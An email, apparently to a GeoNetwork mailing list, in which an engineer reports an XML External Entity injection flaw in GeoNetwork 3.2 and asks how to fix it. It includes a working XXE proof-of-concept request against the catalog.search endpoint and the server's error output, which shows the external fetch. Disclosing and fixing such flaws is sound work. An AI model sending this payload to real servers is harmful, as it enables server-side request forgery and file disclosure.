Hi,
My name es Mariano Valderrey, and I have scanned my GeoNetwork with Accunetix and found XML External Entity Injection vulnerability. I found that en GeoServer you have fixed the problem and maybe I can use the solution for GeoNetwork 3.2.
I wonder if you can help me with this.
Here is what I found:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
**************
To confirm this I send a specific request with this XML to the URL /geonetwork/srv/eng/catalog.search
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE request [
<!ENTITY include SYSTEM "http://google.com">
]>
<catalog.search>&include;</catalog.search>
And I received this result:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Cannot build ServiceRequest
Cause : Error on line 1 of document
http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The
content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</title>
</head>
<body><h2>HTTP ERROR 400</h2>
<p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
<pre> Cannot build ServiceRequest
Cause : Error on line 1 of document
http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The
content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty://
9.3.11.v20160721</a><hr/>
</body>
</html>
******************
The package capture from the server I can see that send a request to http://google.com and I found in the result that the server was redirected to www.google.com.ar. This confirm the vulnerability.
Sorry for my english,
Greetings and thank you so much.
--
Ing. en Sistemas Mariano Valderrey
Tel. (+54 11) 4331 0074 int. 5727
Unidad Base de Datos y Comunicaciones
Gerencia de Gestión Tecnológica
CONAE